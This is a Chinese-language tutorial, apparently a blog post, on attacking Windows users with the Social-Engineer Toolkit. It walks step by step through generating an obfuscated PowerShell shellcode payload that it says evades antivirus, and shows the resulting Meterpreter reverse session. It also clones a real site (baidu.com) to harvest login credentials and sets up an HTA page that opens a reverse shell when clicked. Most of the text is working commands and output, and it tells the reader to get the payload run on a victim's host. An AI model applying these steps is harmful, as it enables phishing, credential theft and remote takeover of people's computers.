社會工程學(Social Engineering)簡稱社工,其通過分析攻擊對象的心理弱點,利用人性的本能反應,以及任何好奇心,貪婪等心理特征進行的,使用諸如假冒,欺騙,引誘等多種手段來達成攻擊目標的一種手段,社會工程學的應用領域非常之廣泛,而很多黑客也會將社工運用到滲透的方方面面,社工也被稱為沒有技術,卻比技術更強大的滲透方式,正所謂 “攻城為下,攻心為上” 這句話用在社工上面是最恰當不過的啦。
接下來將介紹一個工具,社會工程工具包(SEToolkit)工具,該工具由 David Kennedy (ReL1K)設計並開發,並且有一群活躍的社區合作進行維護工作(www.social-engineer.org),該工具包是開源的並使用Python作為開發語言,其主要目的是協助黑客更好的進行社工活動。
PowerShell 注入攻擊
社工工具包中包含一個PowerShell注入攻擊的有效載荷,適用於 Win7 - Win10系統使用,因為PowerShell腳本可以很容易的將ShellCode注入到目標的物理內存中,使用該載荷攻擊不會觸發病毒報警。
1.Kali系統中默認安裝了SEToolkit工具,我們只需要運行該工具,然后從主菜單選擇 1) Social-Engineering。
root@kali:~# setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
2.然后在選擇下一級菜單中的 9) PowerShell Attack Vectors。
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 9
3.接着我們選擇第一個選項,Powershell Alphanumeric Shellcode Injector
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell> 1
4.首先設置好本機的IP地址,我這里是 192.168.1.40 然后等待生成PowerShell腳本,默認放在 /root/.set/reports/powershell/路徑下,我們復制里面的內容。
Enter the IPAddress or DNS name for the reverse host: 192.168.1.40
set:powershell> Enter the port for the reverse [443]:
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 380 bytes
Final size of c file: 1622 bytes
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes
5.通過各種途徑,在被害主機上面執行這一段ShellCode代碼。
powershell -w 1 -C "sv i -;sv pz ec;sv YD ((gv i).value.toString()+(gv pz).value.toString());powershell (gv YD).value.toString() 'JABOAHgAIAA9ACAAJwAkAEsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAa'"
6.回到Kali,會發現出現了一個會話,使用 sessions -i 查詢,上線成功!
msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.1.2; (UUID: skqutxoz) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.40:443 -> 192.168.1.2:64014) at 2019-08-14 12:29:21 +0800
msf5 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows DESKTOP @ DESKTOP 192.168.1.40:443 -> 192.168.1.2:64014 (192.168.1.2)
msf5 exploit(multi/handler) >
SEToolkit 站點克隆
- SEToolkit 還支持站點克隆首先選擇,1)Social-Engineering Attacks
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
2.接着選擇,2)Website Attack Vectors
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
- 選擇 3)Credential Harvester Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack>3
4.這里會有三個選項,第一個是使用系統自帶的模板,第二個是克隆一個頁面,第三個是自定義頁面,此處選擇2,並輸入待克隆頁面。
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.40]:192.168.1.40
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[ ok ] Stopping apache2 (via systemctl): apache2.service.
[ ok ] Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.
SEToolkit HTA 注入攻擊
HTA shell注入攻擊,生成一個克隆頁面,當用戶點擊運行腳本的時候,會觸發反彈一個Shell。
1.根據上方的步驟,重新運行SEToolkit工具然后選擇,1)Social-Engineering Attacks
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
2.選擇 2)Website Attack Vectors
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
3.選擇 8)HTA Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack>8
4.選擇 2)Site Cloner,克隆一個站點,然后選擇一個攻擊載荷,Meterpreter Reverse TCP
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] HTA Attack Vector selected. Enter your IP, Port, and Payload...
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.40]:
Enter the port for the reverse payload [443]:
Select the payload you want to deliver:
1. Meterpreter Reverse HTTPS
2. Meterpreter Reverse HTTP
3. Meterpreter Reverse TCP
Enter the payload number [1-3]: 3
5.用戶點擊頁面,運行腳本以后,成功反彈Shell。
